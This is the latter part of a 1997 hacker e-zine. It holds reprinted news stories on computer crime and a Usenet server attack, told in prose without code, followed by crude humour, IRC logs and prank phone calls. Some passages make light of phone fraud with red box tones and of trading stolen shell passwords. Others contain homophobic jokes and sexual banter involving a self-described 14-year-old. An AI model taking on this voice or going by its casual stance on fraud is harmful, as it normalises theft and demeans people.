are reported, like the 1994 case of Russian hackers who tapped into
Citibank and made $10 million in illegal fund transfers (all but $400,000
was recovered), tend to cause alarm.
"The business is not so much network security as it is network insecurity,"
noted Alice Murphy, an analyst at Dataquest. "There's so much anxiety out
there now."
Just how great the threat is to corporate computer systems is a matter of
debate. The Internet, observes Peter Neumann, a computer scientist at SRI
International, a research group in Menlo Park, Calif., was never really
designed to be secure.
Once the bailiwick of a small community of researchers, it is starting to be
used as a freeway of commerce. "The infrastructure is vulnerable," Neumann
said. "From that larger perspective the risks are enormous."
Dan Farmer, the co-author of Satan with the Dutch researcher Venema, did a
survey of 1,700 corporate and government Web sites late last year and found
that more than 60 percent of them had "serious potential security
vulnerabilities."
Farmer, a programmer at Sun Microsystems Inc., did not break into the
computer systems, but he said they were open to attack and often could be
severely damaged. (His survey results are posted on the Web.)
Yet there is a significant difference, some analysts say, between potential
vulnerability and the actual business risk to corporate computer systems.
"There is risk, but the threat tends to be vastly overstated," said George
Colony, president of Forrester Research Inc., a consulting firm in Cambridge,
Mass.
Forrester estimates that losses from fraud in Internet commerce are likely to
be roughly $1 for every $1,000 of business. To put the matter into
perspective, the fraud losses in cellular phone service are $20 for every
$1,000, according to Forrester, while the losses on credit-card transactions
are nearly $2 for every $1,000 of goods charged.
Still, even skeptics, like Forrester's Colony, agree that computer security
requires continuous attention. "It is a manageable risk, and it should not
deter companies from jumping into Internet commerce," Colony said. "But I
also tell our clients that they should think of computer security as a
guerrilla war that will last forever."
The FBI is treating the battle against computer crime as a long-running
campaign. All new agents are now trained in cyberspace investigations as part
of the curriculum at the FBI Academy in Quantico, Va. And last year the
bureau established three computer-crime squads in San Francisco, New York
and Washington, to pursue cybercrime more aggressively.
"We're really on the cusp of this becoming a major problem," said James
Kallstrom, head of the FBI office in New York. "As more and more of the
economy goes digital, there are huge incentives for criminal attacks on
American corporations."
Computer crime, of course, comes in many forms. An employee with a grudge and
access to a company's computer network may well be far more dangerous, and
costly, than even the most artful hacker.
A survey released two weeks ago by the Computer Security Institute, and
conducted on behalf of the FBI's computer-crime unit, estimated computer
security losses last year at $100 million -- a total only among some 250
companies and organizations that would place dollar figures on their losses
from fraud, theft of trade secrets and other breaches.
The criminal hackers have long been engaged in a kind of cat-and-mouse game
with law-enforcement agencies and private computer-security experts. And that
game is increasingly being played at a higher level, with greater skill and
new tools.
The cell-phone hackers of the past, who electronically jimmied phones for the
thrill and free phone service, have graduated to Web-site hacking.
Today there are an estimated 440 hacker bulletin boards, 1,900 Web sites
purveying hacking tips and tools, and 30 hacker publications like "Phrack"
and "2600: The Hacker Quarterly." There are readily available software
programs for hacking tactics like "war dialing," "sniffing" and "fingering"
-- all used to exploit security weaknesses in computer systems.
[Hacker publications? Oh no! Evil knowledge spreaders!]
"As the stakes become higher, the technical sophistication of the people
doing this kind of illegal activity is increasing," said Edward Hart, a
senior vice president of Science Applications International.
Today there is a brisk illicit market in hacking, according to security
experts, with the street price for breaking into a corporate Web site
typically in the $8,000-to-$10,000 range. Bonus payments are usually demanded
for trade secrets pilfered or damage inflicted on a competitor's computer
system.
Limiting the risk, and damage, to corporate computer systems is the goal of
Palmer and the other security specialists at IBM. The test hacking done by
his team is mainly a fact-finding tool, and only one of many.
The authorized break-ins by these groups, called "tiger teams," are often
more valuable as a marketing tactic than as a research tool. Thick and
exhaustive studies of a company's computer security can be met with yawning
indifference by top executives, but a break-in gets their attention.
Mundane rules, not high-tech wizardry, are crucial to reducing security
risks. A robust firewall to filter what electronic traffic gets into a
company's computer system is helpful, but it can be a Maginot Line approach
to security -- the real weaknesses are elsewhere.
To work from home, employees may have dial-up modems at their desks,
unprotected by firewalls or even passwords. Employees, security experts warn,
must be told to give their passwords to no one; one scam is for hackers to
call new employees, pretending to be members of the corporate technology
staff doing a check of passwords. Another frequent weakness is simple
physical security, watching who goes in or out of the building.
These are hectic times for security consultants like IBM's Nick Simicich, a
44-year-old self-taught programmer. He works from his home in Boca Raton,
Fla., equipped with powerful computers running Linux, a shareware program
that is the operating system of choice for hackers.
Mostly, though, Simicich is on the road -- 85 percent of the time, he
estimates -- logging perhaps 150,000 air miles a year. Continental, the
airline he flies most regularly, invited Simicich to a company parade last
year.
He proudly calls himself a "paid professional paranoid." His goal, he says,
is not to make corporate computer systems immune to hackers. "That's
impossible," he explained. "Our real goal is to raise the bar. First, we do
want to make it harder for them to break in, so the average hacker moves to
an easier target. Second, when they do get in, we want to ensure that the
damage is limited."
©1997 The New York Times
_____________________________________________________________
Threat of 'techno' terrorism being explored
Air travel, stock trading among potential targets
March 18, 1997
SAN FRANCISCO (CNN) -- Last year, a tree fell across a power line in
Wyoming, causing a rippling blackout across nine Western states.
Now, security experts are wondering if a computer hacker could throw a
virtual tree -- a disruptive computer message -- across the nation's
communication lines, causing a meltdown of vital information systems.
"The telephone system, the public switch network, is vulnerable," says
Clinton Brooks of the National Security Agency, who serves on a presidential
panel looking at ways to outsmart potential hackers.
Also on Brooks' litany of potential targets: The air traffic control system,
stock exchanges, the Defense Department, the Federal Reserve, the IRS and
Social Security.
And he says many other information systems that deliver basic needs to people
in their daily lives are also subject to attack -- traffic lights, banking
systems and ATM and credit card networks.
Dangers and defenses:
In October, the Commission on Critical Infrastructure Protection is set to
issue a report on the possible dangers of such cyber terrorism. The
commission's goal is to predict the targets, anticipate the methods that
might be used and figure out defenses. "We need to all be slightly
paranoid, and it's good to start thinking this way about the threats -- the
inside and the outside threats," says Ron Skelton of the Electric Power
Research Institute, an organization of electric utilities.
The stakes are high. For example, air traffic controllers, linked
electronically, escort plane loads of passengers from city to city. Since the
days of the telegraph, railroads have used remote data to safely shuttle
trains from track to track. If those systems are compromised, trains and
planes could crash.
"We have identified more than 100 foreign nations" capable of "information
warfare," Brooks says.
Basic steps can counter threat
Brooks wants a centralized national reporting agency to monitor the risks and
coordinate reactions. And he says it should be established sooner rather than
later.
In the meantime, some of the early solutions to cyber terrorism appear to be
fairly basic: Separate systems. Air traffic controllers use at least three
independent systems, instead of a single system, to land a plane. Isolate
circuits. Data at the San Francisco command center of Pacific Gas and
Electric runs down private lines that do not go through hacker-accessible
telephone switching systems, as voice calls do. Encrypt data. This is
particularly useful in situations where redundant systems or isolated
circuitry isn't feasible.
"Encryption is probably the single most powerful tool that we could employ to
protect ourselves in cyberspace," says Jim Bidzos of RSA Data Security.
San Francisco bureau chief Greg Lefevre contributed to this report.
_____________________________________________________________
Usenet Servers under Assault
Michael Stutz <stutz@dsl.org>
6:04pm 17.Mar.97.PST
One of the largest automated attacks against Internet servers since 1988
began Saturday and continued into Monday. Attacks on Monday marked the sixth
attempt at cracking potentially thousands of Usenet news servers, after four
such attacks on Saturday and one on Sunday.
Utilizing a well-known bug in InterNetNews server (INN), a complete and very
popular Usenet news server package, an unidentified party posted four Usenet
control messages on Saturday that mail copies of the password file and other
information about a system.
Saturday's attacks mailed the files to a machine in Europe owned by IBM.
However, messages on Sunday and Monday were sent to different addresses - a
machine at Rice University and a corporate machine in Germany. The message
headers were spoofed so that they appeared to have originated from David C.
Lawrence, a well-known Usenet administrator who oversees the creation of
hierarchies.
The attack works by gaining access to a news server via a hole in INN. The
<http://www.isc.org/inn.html> hole affects all versions of INN up to 1.5. INN
1.5.1, distributed since December 1996, remains unaffected. Patches are
available from James Brister at the Internet Software Consortium, where INN
is maintained. Brister concurred that the bug is nothing new, saying that the
fixes have been available for some time. These attacks succeeded because not
all news administrators have updated their systems.
Matt Power, a post-doctoral associate at MIT, had written a patch that fixes
the security hole, originally making it public two years ago. "I finally got
them to include it in the distribution last December," he said.
"The [attacker's] script copies the system's password file along with four
other files and emails them to a remote address," said Power. With
<ftp://ftp.cert.org/pub/tools/crack> easily obtained software, the attacker
could then attempt to crack one-way encrypted Unix user passwords with brute
force. The other files - the system's inetd.conf file and output of the
"uname" and "who" commands - could provide valuable information to hack the
system in other ways, Power said.
The bug involved was just recently reported in a CERT
<ftp://info.cert.org/pub/cert_advisories/CA-97.08.innd> advisory dated
20 February - presumably long enough for the cracker to have exploited it but
possibly not long enough for news administrators to have fixed their
software.
Smaller or understaffed operations, where sysadmins may
not have yet heard of the bug or implemented the fix, are especially
vulnerable.
Power likens this sort of attack to one of the Net's most notorious and
widespread attacks. "It is rare to hear of a successful attempt to automate
the penetration of [probably] thousands of servers throughout the Internet,"
he said in an email to Wired News. "I don't know of any similar event that
has taken place since the Robert T. Morris Internet worm of 2 November 1988."
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Usenet News Servers Take a Beating
by Michael Stutz
7:59pm 18.Mar.97.PST -- The bombardment of Usenet news servers across the
Internet that began Saturday continued Tuesday, and while a student at Rice
University had been identified in connection with the attacks, it was not
yet known whether this was a prank or if the attacker had malicious intent.
The machines were attacked via a well-known hole in the interpretation of
Usenet control messages, which normally send information to individual news
servers. The hole exploited a bug in popular news server software that
allowed the messages to contain commands to be executed on the news server
machine.
Though the hole is a known bug with a published fix, a great deal of machines
have been compromised. Many Usenet administrators may still be unaware of the
problem. CERT, the Computer Emergency Response Team, issued a special
bulletin Tuesday to reach more administrators.
"At this time [Monday], 40 sites were known to have been compromised," said
CERT's Terence McGillen. "As of [Tuesday], that number is up to 130. Right
now, the CERT team is working in real time with administrators at the
affected sites. As the days go on this week, we'll post updates as to the
activity - it may die down, or it may not."
McGillen was reluctant to speculate on the identity of the perpetrator. "We
don't focus on that," he said. "We're not concerned in who the intruders were
- just in the means they used to attack the sites."
The attack emailed a machine's encrypted password file and other sensitive
information to a remote address - one of which had been an obviously hacked
account at Rice University in Houston, Texas.
Officials at Rice University said they had found their man. "We do know who
it is and will be taking appropriate steps," said Kathryn Costello, a
university vice president. "We caught him thanks to all of the security
measures we had implemented - it was a good test case for us, actually. We
knew what terminal he was working at and were able to quickly identify him."
His name has not been released.
"The Rice news server was the point of attack," Costello said. "This could
not have affected other university data because it is a standalone system
kept separate from the rest of our computing facilities," she said.
There has been no reported further compromise to these systems as a result of
attack, but some administrators tested the security hole in question, causing
more of the system-cracking control messages to be broadcast to all of
Usenet's servers.
One of those additional messages was possibly from another "real" attacker,
said David C. Lawrence, the news administrator whose email identity was
spoofed by the cracker.
"[While] several later attacks were really administrators who let their
well-meaning tests escape to the world, a couple of attacks have not yet been
classified; at least one of them looks more like a real copycat attack than
an innocent mistake."
In order to gain unauthorized access to any of the attacked systems, the
cracker would first have to run software to break the password information.
So far, no administrators are aware of any such further compromise on their
systems.
"I have talked to several dozen sites at this point, well over a hundred,"
said Lawrence. "None have yet reported any additional compromise stemming
from this attack. A significant factor in this is that the password file
delivery destination machines in the original attack - two hosts in IBM
Sweden's network - were unreachable from pretty much the time that the attack
began," he said.
Speaking of the possible copycat attack, Lawrence said it was too early to
speculate whether the person would receive anything he could use before being
nabbed, anyway. "First he has to break some passwords, then he has to contact
the machine that has the account for the broken password, if he can get past
their firewall and any additional security guards in place," he said.
Things could have been worse. While these attacks seem to be just mailing a
copy of the password file to an outside email address - presumably to be
later cracked with brute force - virtually any system command could be
performed, including the erasing of system data. This is clearly a serious
hole.
"It was characterized as an attack on the infrastructure, which I would say
is serious," said McGillen. "This problem has been around for a while, it's
just that [network administrators at these sites] are swamped with work. We
don't expect this to go away overnight."
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
[Article provided by Keystroke]
Man waits 20 years for phone line but dies before getting it
BUCHAREST, Romania (AP) -- Romanians are used to waiting a long time for a
telephone. But 20 years for a dialtone was too long for Constantin Coltea.
Coltea, who died last year, applied for a telephone line in 1977. The state
telephone company, Romtelecom, responded this month, according to the
Evenimentul Zilei daily.
In its letter, Romtelecom told Coltea to confirm within 15 days that he still
wanted the line or his request would be dropped. Coltea's 81-year-old widow,
Caliopi, said she no longer can afford it, living on a $14 monthly pension.
Lidia Toboc, a Romtelecom spokeswoman, could not confirm Coltea's case, but
said there were two cases a year ago involving applicants who waited 15 years
for their service.
Since then, she said, "our management has been trying to resolve long-delayed
applications."
Bribes of up to several hundred dollars are common in Romania to get a line
installed more swiftly. The government plans to privatize 30 percent of the
phone company.
_____________________________________________________________
[This editorialised article is courtesy of ec|ipse & Keystroke, they don't
know who it was that added the top 10 list. I know this has nothing to do
with hacking, phreaking, etc, but it's too damn funny not to publish.]
Subject: Only in California... (fwd)
You wanted raunchy? You got it!...times three!
Here's one for the archives...
This is an actual article from the LA Times:
"In retrospect, lighting the match was my big mistake. But I was only trying
to retrieve the gerbil," Eric Tomaszewski told bemused doctors in the Severe
Burns Unit of Salt Lake City Hospital. Tomaszewski and his homosexual
partner Andrew "Kiki" Farnum had been admitted for emergency treatment after
a felching session had fone seriously wrong. "I pushed a cardboard tube up
his rectum and slipped Raggot, our gerbil, in," he explained. "As usual,
Kiki shouted out 'Armageddon', my cue that he'd had enough. I tried to
retrieve Raggot but he wouldn't come out again, so I peered into the tube and
struck a matche, thinking the light might attract him." At a hushed press
conference, a hospital spokesman described what happened hext. "The match
ignited a pocket of intestinal gas and a flame shot out of the tube, igniting
Mr. Tomaszewski's hair and severely burning his face. It also set fire to
the gerbil's fur and whiskers which in turn ignited a larger pocket of gas
further up the intestine, propelling the rodent out like a cannonball."
Tomaszewski suffered second degree burns and a broken nose from the impact of
the gerbil, while Farnum suffered first and second degree burns to his anus
and lower intestinal tract.
OK, here's the top ten things that scare me the most in reading this story:
10. "I pushed the cardboard tube up his rectum..." Ouch!!!
9. "So I peered into the tube..." Aaaaaaahhhhhh! I'm sorry, but that's like
looking through a telescope into Hell. I'd rather use binoculars to stare at
the sun.
8. That poor gerbil (who obviously suffers from low self-esteem) being shot
out of the guy's anus like Rocky the Flying Squirrel on Rocky and Bullwinkle.
7. Suffering a broken nose from a gerbil being launched out of someone's
anus. I'm just guessing, but I seriously doubt said gerbil was springtime
fresh after his little journey into Kiki's 'tunnel of love'.
6. People walking around with these volcanic-like pockets of gas in their
rectums.
5. People who do this kind of thing and then admit what they were doing when
taken to the emergency room. Sorry, but I think I would have made up a story
about a gang of roving, pyromaniac, anal sex fiends breaking into my house
and sodomizing me with a charcoal lighter before I admitted the truth. Call
me old fashioned, but I just can't imagine looking at a doctor and saying,
"Well Doc, it's like this. See, we have this gerbil named Raggot and we took
this cardboard tube..."
4. "First and second degree burns to the anus". Wouldn't this make the
burning itch and discomfort of hemorrhoids a welcome relief? How does one
ever take a healthy poop after something like that? And the smell of burning
anus must be in the top five most horrible scents on the face of God's green
earth.
3. People name "Kiki" which is obviously a Polynesian word for 'idiotic
white men who insert rodents up their butts.'
2. What kind of a hospital would hold a press conference on this??
1. This happened in Salt Lake City. What kind of people are those Mormons??
(I'm starting to get a whole new image of the Osmond family)
_____________________________________________________________
©1997 HAVOC Bell Systems Publishing
No part of this publication may be reproduced in whole or in part without the
expressed written consent of HAVOC Bell Systems Publishing. [Unless you're
leet, then it's ok. Well, just so long as you don't plain copy the zine. If
you wanna take this to the copy center and blow it up and put in on the
ceiling above your bed, we're not gonna try and stop you.]
_____________________________________________________________
-------------------
--=[Reader Survey]=--
The HAVOC Technical Journal
-------------------
[This survey is designed to help us better suit our magazine to the reader,
or we may just be trying to get a good laugh, but we haven't decided yet.]
Name: M/F: Age: Occupation/grade:
City:
State:
Zip Code:
Country:
Area Code:
SSN: [reference purposes only ;)]
Why are you reading this?
Where'd you get it?
I am into: [ ] Hacking [ ] Phreaking [ ] Cracking [ ] Warez [ ] Coding (any)
[ ] Anarchy [ ] Carding [ ] Law enforcement [ ] Public education
I am guilty of the following:
[ ] Eating paint chips
[ ] Being the leader of a cult of programmers who intend to commit suicide
[ ] Posession or intent to distribute THTJ
[ ] A misdemeanor (if so, describe)
[ ] A felony (if so, describe)
[ ] Physically attacking bell employees
[ ] Working for a phone company
On a scale of 1 - 10, with 10 being leet, 0 being lame, I am best described
as:
[Send all replies to mazer@cycat.com]
_____________________________________________________________
--------------
--=[IRC logs]=--
Humorous adventures in IRC
--------------
*** Your nick is now Sub-Male
*** Now talking in #freebsd
> is this a sex channel ?
<ReD_dAwG> but the new one will be a package deal
<WyzeOne> Uuuh, one 9-gig drive is not good
*** You were kicked by W ((WyzeOne) idiot)
#freebsd unable to rejoin channel (you're banned!)
_____________________________________________________________
[This could very well be the definition of 'AOL lamer' used in Webster's,
courtesy of Scud-O.]
<xHoTiCeX> CuM On BiAtCh!
<xHoTiCeX> U wAnT Me TO PulL ThE InSiDe HaCk?
<Scud-O> I SAID NO 3reet teXt f00l
<xHoTiCeX> BiTcH
<Scud-O> gee you are erret.... hackers2
<xHoTiCeX> CuM On BiTcH, Do U WaNT tO danCe?
<Scud-O> disco?
<xHoTiCeX> U rEaLlY aRe A dUmb PiEcE Of ShIt ArEn'T U?
<Scud-O> no you are
<Scud-O> you just got taken over fool
<xHoTiCeX> So
<xHoTiCeX> DoNt CaRe AbOuT tHaT sHitTy ChAnNeL
<Scud-O> why the FUCK do you keep mixing caps?
<xHoTiCeX> AlL I CaRe AbOuT Is FuCkInG U uP!
<Scud-O> go ahead
<Scud-O> what you got you little warez puppy?
<xHoTiCeX> EvEr BeEn On AoL LamMah?
<Scud-O> nuke.exe?
<Scud-O> no... but i think you have
<xHoTiCeX> SaTaN
<Scud-O> you know ANY thing about ip?
<Scud-O> satan? you dumb ass... satan is a prog fro cracking
hosts
<Scud-O> dumb fuck
<Scud-O> what is a routing table?
<xHoTiCeX> Im In WpSx BiTcH aNd U ArE On SoMe ShItTy ChAnNeL
loOkS lIke U dA dUmB aSs
<Scud-O> excuse me? cant tell what ya wrote with all those
ereet typing skills
<xHoTiCeX> SaTaN iS tHe UlTiMaTe HaCkInG tOol DuMbAsS!
<xHoTiCeX> Ha LaMaH
<xHoTiCeX> U DoNt KnOw ShIt
<Scud-O> NO YOU dont know shit
<Scud-O> who wrote satan then?
<xHoTiCeX> ThAtS sOmEtHiN To Be PrOuD Of Huh?
<xHoTiCeX> DuMb FuCk
<Scud-O> WHO WROTE IT?
<Scud-O> btw, the boys in #hackers are loving this
conversation
<xHoTiCeX> ReAl Ppl DoNt GivE NaMes DumB FuCk
<xHoTiCeX> R u ThAt sTuPiD?
<xHoTiCeX> HeH LaMah!
<Scud-O> you havcent even USED satan have you?
<xHoTiCeX> YeS I hAvE
<Scud-O> WHO WROTE IT?
<xHoTiCeX> KnOw OnE KnOwS WhO wRoTe It LitTle ShIt
<Scud-O> you are a dumb fuck.. go ask someone ya lammah
<xHoTiCeX> AlRiGht ThEn SmArT aSs WhO WrOtE It?
<Scud-O> dan farmer
<xHoTiCeX> AlRiGhT sO Who Did SmArT Ass
<xHoTiCeX> Fuck OFf
<xHoTiCeX> u SoMe LiTtLe NeRd ThAt DoeSnT KnOw ShIt BiTcH
<Scud-O> no
<Scud-O> im the fuckin football captian
_____________________________________________________________
[This log was provided by Keystroke from an incident shortly after TiSDaL had
taken over the channel #-=|\|E\\'B|ES=-.]
<Loom> age/sex check
<TiSDaL> 14
*** Joins: aVeNGe1 (Technology@modem3.cherryhill.wserv.com)
*** Joins: |B0GS| (~revenge1@modem3.cherryhill.wserv.com)
*** Joins: |D0OR| (Technology@modem3.cherryhill.wserv.com)
*** Joins: aVeNGe6 (Technology@modem3.cherryhill.wserv.com)
*** Joins: |F0ND| (Technology@modem3.cherryhill.wserv.com)
*** Joins: |M0HO| (Technology@modem3.cherryhill.wserv.com)
<TecHnoKiD> give me ops!!!!!!!!
* Loom is 16/f
<TiSDaL> nice bots
<TiSDaL> clones even
<TecHnoKiD> or i'll take them with my army!!!!
<TiSDaL> wanna watch em all ping out?
<TecHnoKiD> no not really
<TiSDaL> take me baby
<Loom> come on Tisdal give him ops
<TiSDaL> rape me
<TiSDaL> rape me and my phriend
* TecHnoKiD take TiSDaL and bites his neck!!!!
*** Joins: |B0TH| (Technology@modem3.cherryhill.wserv.com)
<TiSDaL> damn bot's in the wrong channel
*** Quits: |D0OR| (G-lined)
*** Quits: aVeNGe1 (G-lined)
*** Quits: |M0HO| (G-lined)
*** Quits: |B0TH| (G-lined)
*** Quits: |F0ND| (G-lined)
*** Quits: TecHnoKiD (G-lined)
*** Quits: |B0GS| (G-lined)
<TiSDaL> lol
<TiSDaL> see what that gets ya
_____________________________________________________________
[This log courtesy of Redtyde from #stupid.]
<JG> watch youf fuckin mouth redtyde, that inappropriate for this channel
<JG> alright.. why were the blond girl's titties square?
<JG> because she forgot to take the tissues out of the box first
<Skip> uh ah
<JG> HAhaHAhaHHaHaHaHhAhaHAhH
<JG> holy shit that was hilarias!
_____________________________________________________________
[Log of a conversation over getting ops in #phreak.]
<|-A|pHa-|> hello
> hi
<|-A|pHa-|> do you need any shellz
<|-A|pHa-|> i can you over a hundred shells
<|-A|pHa-|> with the pw's
<|-A|pHa-|> under one condition
> wassat?
<|-A|pHa-|> y'all gimme ops
> well, that's against company policy
> hold on, i'll talk to my manager and see what i can do
<|-A|pHa-|> ok
<|-A|pHa-|> also t offer i have a fserve
> he says i don't get paid enough to do that
> oh, ok what's on it?
<|-A|pHa-|> and a web page
<|-A|pHa-|> with the anarchist cookbook as a link.
<|-A|pHa-|> also how to make bongs
<|-A|pHa-|> and other pot smokin apartues
> ok lemme relay this to the boss
<|-A|pHa-|> um...NRA
<|-A|pHa-|> alsp
<|-A|pHa-|> also
<|-A|pHa-|> and bass fishin links
<|-A|pHa-|> mirc scripts
<|-A|pHa-|> how to hack links
> i don't see how he can turn this down
> but he says our status quo would be in jeopardy, what's that mean?
<|-A|pHa-|> i dunno
<|-A|pHa-|> but relay the other stuff thats on my page to him
<|-A|pHa-|> on my fserve i have mirc scripts,doom special edition,descent
<|-A|pHa-|> um..
<|-A|pHa-|> programs for computers
<|-A|pHa-|> irc programs
> he's gonna have to talk to the regional manager, i had our secretary write
it all down though, it sounds like a great deal in my opinion
<|-A|pHa-|> ok thanx
<|-A|pHa-|> if i have to go soon i will come back later for the answer
> cool beans
_____________________________________________________________
[IRC quote of the month]
<ec|ipse> poof puts the "cocksucking moron" back in "cocksucking moron"
_____________________________________________________________
----------------------
--=[Funny Phonecalls]=--
The HAVOC Technical Journal
----------------------
[This is from a conversation between Scud-O and an AT&T ISP operator, which
took place after Scud forgot his password. AT&T uses 'security words' to
verify that you are who you say you are, and Scud's was 'fuck you'.]
<ATT> Sir I'm gonna need your security word.
<Me> My security word? Well, that would be FUCK YOU!
<ATT> Uhh... correct... here is your password, and you need to change your
security word sir, it's offensive.
<Me> Oh yeah? Well fuck you! <click>
_____________________________________________________________
[_Electro_ made this call during lunchtime at school, and I believe the
cafeteria food had sufficiently intoxicated him.]
<Op> BC Tel Operator, How May I Help You?
<Me> Yes, Hi. How are you doing today?
<Op> Fine Thanks, How Can I help you?
<Me> Well I was gonna pay with my calling card, but I can't seem to find it.
Would you like me to insert a coin instead?
<Op> Yes go ahead, insert your quarter.
<Me> No prob (I PLAY MY RED BOX TONES WITHOUT PUTTING IN 5 CENTS FIRST)
<Op> I am sorry sir you aren't putting in real coins
<Me> Hmmm. . .Yes, But. . . enough about me, lets talk about you
<Op> Excuse me?
<Me> So how's life? How are the kids? Oh Yeah, Can You tell me whats wrong
with my red box?
<Op> Very Funny. . . <Click>
_____________________________________________________________
[This interesting conversation occurred took place between shoe and the local
bell operator.]
<Op> YES? BELL SOUTH HERE! WE ARE SMART AND NOW ONLY HAVE 4 FONES IN THIS
CITY THAT PEOPLE CAN REDBOX!
<Me> Uhh, ok. Quit yelling I gotta ask you somethin.
<Op> Go on...
<Me> I need the number for Cuntflex.
<Op> Excuse me?
<Me> You heard me, Cuntflex.
<Op> That number would be 581-FUCK-YOU
<Me> Are you sure? I tried that and got your house.
<Op> <click>
[Well, ok it didn't all happen, but he did ask her that, and she did give him
that number.]
_____________________________________________________________
------------------------ ----------------------
--=[HAVOC Bell Systems]=-- --=[Acknowledgements]=--
------------------------ ----------------------
Agrajag : PLA Michigan btm : Elite
darkcyde : #phreak old-schooler digipimp : Co-conspirator
Digital_X : Nemesis dr1x : Perverted bastard
disc0re : Distributor ec|ipse : Hysterical bastard
Keystroke : Submissions Editor Jisa : She's just a girl
KungFuFox : Acting Editor RBCP : Funniest man alive
memor : Ueberleet French phreak shoelace : Kewl fellow, #phreak'er
psych0 : Writer WeatherM : Pan1k's right hand man
REality : #phreak's southern accent yesimlame : No, he's not
Redtyde : #phreak not so old-schooler #phreak : My home on IRC
Scud-O : Mighty Editor in Chief Everyone who I get along with.
theLURK3R : Coder guru
UnaBomber : Tired of IRC
_____________________________________________________________
This Month's Question: If a phreak calls from the forest, and nobody's around
to keep him out of trouble, what're the odds that the call will be free?
[The HAVOC Research Department of HAVOC Bell Systems has determined that
there is a 90% chance that it will be. What about the other 10%, you may be
wondering? Smokey the Bear fights more than fires, he's with the Gestapo.]
_____________________________________________________________
Next Month:
[My crystal ball is currently being refurbished, and cannot predict what is
to come in THTJ10. Stay tuned for further details as they emerge.]
Issue 10 is out May 1st!
Send all articles for issue 10 to Keystroke at: keystroke@thepentagon.com
==========================================================
= Is this copy of The HAVOC Technical Journal skunked? =
= If this file doesn't read at 165968 bytes, it probably =
= doesn't have a born on date! Get a fresh copy from our =
= site at: http://www.geocities.com/SiliconValley/8805/ =
==========================================================
--=[EOF]=--
